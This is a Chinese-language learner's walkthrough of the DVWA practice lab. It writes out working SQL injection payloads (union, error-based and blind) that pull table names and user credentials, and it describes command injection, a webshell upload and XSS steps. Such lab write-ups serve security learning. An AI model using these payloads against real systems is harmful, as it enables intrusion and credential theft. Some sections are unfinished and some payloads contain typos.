DVWA靶场实操

1.Brute Force

审计一下发现啥也没有，也没别的过滤，就只是和数据库比对。也就是说只要字典够大，就能够爆。

那就抓个包爆破，看length。

然后发现我字典太大了，爆出来很多。

应该是爆出来这两个。

还爆出来两个万能密码。

 通过了。

2.Command Injection（命令注入）

了解一下。

然后看代码。

看不太懂，但是看到了ip，ping，那就用本机ip，ping一下，然后在网上找下教程。

找了个教程，懂代码意思了。

DVWA-对Command Injection(命令注入)的简单演示与分析-腾讯云开发者社区-腾讯云 (tencent.com)那就把常用的注入命令都玩一下。

1.ipconfig

2.dir

3.systeminfo 

4.netuser 

还没搞好。

3.Cross Site Request Forgery

 

构造链接访问，改密码的。

原理还是不懂，去网上搜了一下。

 4.File Inclusion文件包含漏洞

get方式传一个文件路径。

随便传一个，报错了。 找个本地文件地址传上去，过了。

 5.Fileupload文件上传漏洞

没有过滤，那就一句话木马加易建联。

进去了。 

6.Insecure CAPTCHA

Insecure CAPTCHA（不安全的验证码），CAPTCHA全程为Completely Automated Public Turing Test to Tell Computers and Humans Apart（全自动区分计算机和人类的图灵测试）的简称。这一模块的内容叫做不安全的验证流程比较好，主要是验证流程出现了逻辑漏洞，而不是谷歌的验证码有问题。这一模块验证码使用的是Google提供的reCAPTCHA服务。

 看下代码。

 

第一步是验证，step为1，验证通过了之后step为2。

那想个办法跳过验证，抓个包改step。

 

过了。 

7. SQL Injection

1.Union注入

判断注入类型

回显正常，不是数字类型。

没有回显，所以是字符型，单引号闭合。

且2个字段。

1.获取数据库名，用户名

1' union select database(),user()#

 

2.表名

1' UNION SELECT 1,table_name from information_schema.tables where table_schema='dvwa'#

一个guestbook  一个users

3.列名

1' UNION SELECT 1,column_name from information_schema.columns where table_schema='dvwa' and table_name='users'#

4.获取数据 

1' UNION SELECT 1,group_concat(user,0x3a,avatar) from users#

2.Error注入

1.获取表名

1' and updatexml(1,concat(0x7e,(SELECT table_name from information_schema.tables where table_schema=database() limit 0/1,1),0x7e),1)#

 

同理，获取第二列只需将上面payload改为limit 1,1即可。

2.获取列名

1' and updatexml(1,concat(0x7e,(SELECT column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),0x7e),1)#

 

3.获取数据

1' and updatexml(1,concat(0x7e,(SELECT group_concat(user,0x3a,avatar) from users limit 0,1),0x7e),1)#

 

3.原因

8. SQL Injection(Blind)

 看回显判断注入类型。

不是数字

是字符型且单引号，OK。

1' and length(databbase())=4#

数据库名长度为4。

1' and ascii(substr(database(),1/2/3/4,1))>90#

 

 用ascii码比较一个一个判断数据库名字母范围。

解出来数据库名为dvwa。

猜数据库中的表名：猜表的数量–>猜表的名称的长度–>猜表的名称

1' and (select count(table_name) from information_schema.tables where table_schema='dvwa')=2#

两个表

1' and length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))=9#

猜两个表的长度。

一个是9，一个是5。

1' and ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),1))=103#

然后用ascii码猜表名，一个是guestbook，一个是users。

猜列。

9.XSS（DOM）

 

观察后发现选择语言后，URL也会变。

所以判断可以用default传参，所以在French后加xss语句。

成功。

10.XSS（Reflected）

输入后发现是用name传参。

11.XSS（Stored）

 

发现name输不进去。

看看代码。 

 

发现name有长度限制。

修改一下。

成功。

​​​​​​​